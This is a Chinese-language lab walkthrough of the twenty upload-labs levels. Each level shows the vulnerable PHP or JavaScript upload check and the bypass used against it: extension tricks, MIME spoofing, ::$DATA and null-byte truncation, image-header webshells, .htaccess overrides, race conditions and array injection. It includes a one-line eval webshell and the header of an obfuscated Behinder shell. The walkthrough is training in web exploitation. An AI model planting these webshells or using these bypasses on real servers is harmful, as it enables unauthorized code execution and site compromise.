声明
学习文件上传漏洞
第一关
源码分析
可以看到allow_ext是黑名单,只允许jpg,png和gif进行,在前端进行校验,通过将文件名,截取文件名点.后面的后缀和这个黑名单进行比较
function checkFile() {
var file = document.getElementsByName('upload_file')[0].value;
if (file == null || file == "") {
alert("请选择要上传的文件!");
return false;
}
//定义允许上传的文件类型
var allow_ext = ".jpg|.png|.gif";
//提取上传文件的类型
var ext_name = file.substring(file.lastIndexOf("."));
//判断上传文件类型是否允许上传
if (allow_ext.indexOf(ext_name + "|") == -1) {
var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
alert(errMsg);
return false;
}
}
漏洞复现
提示,只能上传图片,我们目的要上传webshell
因为是前端js校验,可以直接用burp抓包修改文件类型(上传1.gif修改为1.php)
我上传的是1.gif,但是我抓包改成了1.php
用冰蝎链接,由于上传的是在upload目录下,添加URL
http://192.168.239.138:8007/upload/1.php
删掉upload下的1.php,因为每次上传成功都是那个目录下,所以过一关后,先删掉
第二关
源码分析
可以看到,通过判断文件type,来进行限制,也就是HTTP请求中的Content-Type字段
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
}
漏洞复现
我们上传1.php,可以看到Content-Type不是image/jpeg(图片)系列的
我们直接抓包修改转发三连即可,成功上传
第三关
源码分析
采用了黑名单的验证方式,黑名单过滤也是一种不安全的方式,黑名单中定义了一系列的不安全的扩展名,服务器在接收到文件后,与黑名单做对比,从而决定是否要过滤上传的文件
禁止了asp,aspx,php,jsp
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array('.asp','.aspx','.php','.jsp');
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if(!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
phtml,php3,php4,php5,pht没有禁止,并且在apache配置文件中当php解析,
尝试通过后缀名绕过
把我们的1.php修改成1.php3,可以绕过,上传后,名字也被改成随机数值,但是我这里解析有点问题,第一个标签的404就是,上传成功访问不到
换一种思路,使用图片马
先制作(画)一张图片为1.jpg
进入命令行,目标把冰蝎马1.php和1.jpg合成,制作成图片马2.jpg
上传2.jpg即可,往后2.jpg就是我们的图片马
我这连接失败了,算了,干嘛非得在冰蝎这一棵树上吊死,试试最简单的一句话图片,这里不用copy命令生成,直接画个图片,然后右键nodepad编辑插入一句话
<?php @eval($_POST['wz']);?>
同样的步骤F12,查看随机生成的文件名,然后直接上菜刀吧
拿下
第四关
源码分析
过滤了好多后缀吖…
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //收尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
漏洞复现
网上大佬的教程基本上都需要这么做
首先上传一个.htaccess内容如下的文件:
SetHandler application/x-httpd-php
但是我第三关的时候就没有上传htaccess,我这里就展示一下吧
创建并上传1.htaccess
我把内容又加了一遍
再次上传第三关中的图片马,可成功上传,可能每个人的代码都有细微的差别,我这里就当做不上传htaccess文件就不能解析吧
第五关
源码分析
黑名单加入了htaccess的限制
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
修改我们的冰蝎马,改成1.phP
还说重名了
没有大小写限制,上传成功
第六关
源码分析
可以看到,判断前,都转换成小写,所以,pHp这类的都没办法使用了
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = $_FILES['upload_file']['name'];
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file,$img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件不允许上传';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
修改文件后缀为1.php .这种形式,从代码执行流程分析来看,会先去除文件名末尾的.,去除之后的文件后缀是 .php[空格],利用.php[空格]绕过黑名单,然后利用windows的文件命名规则默认除去空格和.,达到上传.php的目的。
绕过过程
1.php
1.php[空格]
1.php[空格].
所以我们在上传的时候,上传1.php,BP抓包的时候,修改冰蝎马1.php为1.php .
F12获取路径后,使用冰蝎连接
第七关
源码分析
加入了收尾去空,所以我们的空格战略无法奏效
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
不要空格的话,我们还有点.
绕过思路
1.php
1.php.
上传的时候,上传1.php,BP抓包的时候,修改冰蝎马1.php为1.php.
这里注意,冰蝎连的时候,连得是下面的路径,千万不要连1.php.了
http://192.168.239.138:8007/Pass-07/../upload/1.php
第八关
源码分析
末尾的点也删除了
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
可以看到,与前面第七关的代码相比,少了去除文件名的"::$DATA"字符串这一步。这里还是利用windows的一个特性。
NTFS文件系统包括对备用数据流的支持。这不是众所周知的功能,主要包括提供与Macintosh文件系统中的文件的兼容性。备用数据流允许文件包含多个数据流。每个文件至少有一个数据流。在Windows中,此默认数据流称为:$ DATA。
简单讲就是在php+windows的情况下:如果文件名+":: D A T A " 会 把 : : DATA"会把:: DATA"会把::DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名。
注:仅windows适用喔
绕过思路
1.php
1.php::$DATA
上传的时候,上传1.php,BP抓包的时候,修改冰蝎马1.php为1.php::$DATA
这里注意,冰蝎连的时候,附上我连接的路径,千万不要连::$DATA了
http://192.168.239.138:8007/Pass-08/../upload/202012091010163363.php
第九关
源码分析
可以看到,这里代码的安全性比之前的都要更高,黑名单类型全,大小写经过转换,去除了文件名末尾的点,去除了文件名尾空格,还去除了::$DATA。。但是,这里还是可以绕过的。这里的代码逻辑是先删除文件名末尾的点,再进行首尾去空。都只进行一次。故可以构造点空格点进行绕过,也就是后缀名改为xx.php. .,也是利用了Windows的特性。
也就是说,如果从第三关到第九关,如果目标服务器是windows系统的话,均可用点空格点绕过。
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = strtolower($file_ext); //转换为小写
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
绕过思路
1.php
1.php. .
上传的时候,上传1.php,BP抓包的时候,修改冰蝎马1.php为1.php. .
这里注意,冰蝎连的时候,附上我连接的路径,千万不要连1.php. .
http://192.168.239.138:8007/Pass-09/../upload/1.php
第十关
源码分析
str_ireplace()函数,不区分大小写替换
这里代码没有了之前关卡里的去除文件尾点、空格、::$DATA的操作,估计是针对非Windows系统的。这里存在的问题是,利用str_ireplace对黑名单里的文件后缀名进行了替换,换成空字符,使用了str_ireplace函数,即不区分大小写,故大小写绕过不适用。但是这里替换是替换成了空字符,于是我们可以双写后缀名,如.pphphp,使得替换后的后缀名为php。
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = str_ireplace($deny_ext,"", $file_name);
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
绕过思路
1.php
1.php. .
上传的时候,上传1.php,BP抓包的时候,修改冰蝎马1.php为1.pphphp
这里注意,冰蝎连的时候,附上我连接的路径
http://192.168.239.138:8007/Pass-10/../upload/1.php
第十一关
源码分析
可以发现,这里与之前代码相比,使用了白名单,只允许上传,jpg,png,gif三种格式文件。
但是在进行move_uploaded_file前。利用_GET传入,导致服务器最终存储的文件名可控。故可以利用这个点进行绕过。
这里利用的是00截断。即move_uploaded_file函数的底层实现类似于C语言,遇到0x00会截断
截断条件:
1、php版本小于5.3.4
2、php.ini的magic_quotes_gpc为OFF状态
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
漏洞复现
首先确认自己的环境的php版本环境是否符合条件。其次查看php.ini配置文件中的magic_quotes_gpc是否为Off。
上传后,抓包
构造sava_path=/upload/1.php%00绕过
第十二关
源码分析
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
漏洞复现
同第十一关,只不过请求方式由GET变为POST
第十三关
源码分析
将上传的文件读取先读取两字节,通过对比文件头来确认文件类型。
于是就可以制作图片马,将php语句隐藏在图片中,然后结合文件包含漏洞执行php。
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2); //只读2字节
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
漏洞复现
题中提示,让我们使用图片马
那就再说一次图片马制作过程
创建2.jpg
创建2.php
cmd下执行命令
copy 2.jpg /b+ 2.php /a 3.jpg
往后3.jpg就是我们的图片马
直接上传3.jpg
我这里burp抓包修改了一个地方
代码中检测了文件头的2字节内容,也就是说我们只需要将文件的头两个字节修改为图片的格式就可以绕过,通常 JPEG/JPG: FF D8 , PNG:89 50,GIF:47 49
使用Brup抓包,然后发送到Repeater模块。
将HEX编码改为 FFD8 点Go后成功上传JPG。
对照着右侧,大概出现在Content-Type: image/jpeg
我们要改的就是左侧两个0d0a后面的两个字节,下图是修改后的
菜刀连接
http://192.168.239.138:8007/Pass-13/../upload/2320201209112519.jpg
第十四关
源码分析
使用了getimagesize()函数
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息。
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
漏洞复现
直接上传图片马,不用抓包修改
第十五关
源码分析
使用了exif_imagetype()函数
function isImage($filename){
//需要开启php_exif模块
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
漏洞复现
其实还是要用图片马,我这里用大佬们的,有时候我们自己copy的可能无法使用
第十六关
源码分析
二次渲染
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
// 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
// 获得上传文件的扩展名
$fileext= substr(strrchr($filename,"."),1);
//判断文件后缀与类型,合法才进行上传操作
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".jpg";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".png";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
//使用上传的图片生成新的图片
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
//给新图片指定文件名
srand(time());
$newfilename = strval(rand()).".gif";
//显示二次渲染后的图片(使用用户上传图片生成的新图片)
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
漏洞复现
还是通过图片马,我这里不详细描述
具体请参考大佬
https://xz.aliyun.com/t/2657
我这里直接“一马平川”了
第十七关
源码分析
不难发现,这里是先move_uploaded_file函数将上传文件临时保存,再进行判断,如果不在白名单里则unlink删除,在的话就rename重命名,所以这里存在条件竞争。
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
漏洞复现
这里专业术语叫做条件竞争,因为涉及到删除,我们完全可以通过抢占先机的方式,抢在没删除之前进行访问
主要思路
有两个人,A在不断地上传文件,B在不断的访问文件,而服务器在不断的删除文件,只要A刚一上传,服务器还没来得及删除,B就访问,那么就OK了
我们这里就用BP的爆破模块intruder来模拟这俩人
先设置上传请求,记住此处的文件名,等下要用来拼接访问请求的url,上传冰蝎马,抓包,放到爆破模块
访问冰蝎马,然后用burp抓包
http://192.168.239.138:8007/Pass-17/../upload/1.php
burp抓包后发送至intruder模块,然后设置payload,这一步和上传请求设置差不多,都是Null payloads、5000次、50个线程
不要忘记情况变量
设置好两个模块后同时启动,观察结果,因为我们传入的冰蝎是可以显示phpinfo的,所以如果访问成功的话,会返回php的配置信息。
我这里第一次光荣失败
改变思路,不用冰蝎马了,平时我冰蝎连接,直接用phpinfo.php
内容
<?php
phpinfo();
?>
第十八关
源码分析
这里先将上传的文件保存(move函数),再rename重命名一下。所以也存在条件竞争,绕过方法和上面Pass-17差不多,这里就不重复写了。
漏洞复现
参照Pass-17
第十九关
源码分析
从源码来看的话,服务器端定义了一系列的黑名单,save_name参数就是我们保存名称的参数了。这里并未对上传的文件类型做什么判断,仅仅是对保存的名称做了黑名单处理。不难看出这些黑名单都是小写的形式,也就是说我们完全可以上传一个一句话木马然后将其命名为PHP后缀即可绕过,真是跟没有防护一样。
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
漏洞复现
直接上传冰蝎马1.php文件,保存名称填成PHP
冰蝎连接
http://192.168.239.138:8007/Pass-19/../upload/1.PHP
第二十关
源码分析
这关的代码审计至关重要,具体看代码正文。
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
//检查了MIME类型
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
//检查文件名
//判断save_name参数是否为空,为空就把文件本来名称赋值给$file,否则就是将save_name参数的值赋给它
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
//判断$file是否是数组,如果不是数组则将其拆成数组,然后数组最后一个的值(end函数就是取数组最后一个的值)同白名单做比较,符合jpg、png、gif中的一种就允许上传了。
if (!is_array($file)) {
$file = explode('.', strtolower($file));
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
//允许上传之后还要把数组的值拼接在一起对文件进行重命名
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}
漏洞复现
构造save_name[0]=cs.php/ save_name[1]置为空 save_name[2]=jpg(一个白名单的合法后缀)。这样的话,reset($file)取的是数组的第一个元素即cs.php/,然后接了一个’.'符号,之后又将数组最后一个元素内容拼接到一起。可能有的人会疑问数组最后一个值不是jpg吗?其实当我们只设置了两个数组元素的时候,数组的元素个数就只有两个了。
上传冰蝎马1.php,名字先默认,提交抓包
先修改mine为
image/jpeg
修改save_name为数组
Content-Disposition: form-data; name="save_name[0]"
1.php/
-----------------------------31787154767154
Content-Disposition: form-data; name="save_name[2]"
jpg
-----------------------------31787154767154
注意下图中红色横线的数字串,用你原来的,要不无脑替换这里
转发
冰蝎连接,完结撒花
http://192.168.239.138:8007/Pass-20/../upload/1.php
冰蝎马
密码c9n3
<?php
/*
声明:以下信息并不是本php文件的作者,不对本文件负责;以下信息只是提供了对本php文件加密。如果需要对PHP文件进行加密,请按以下信息联系。
Warning: do not modify this file, otherwise may cause the program to run.
QQ: 1833596
Website: http://www.phpjm.net/
Copyright (c) 2012-2020 phpjm.net All Rights Reserved.
*/
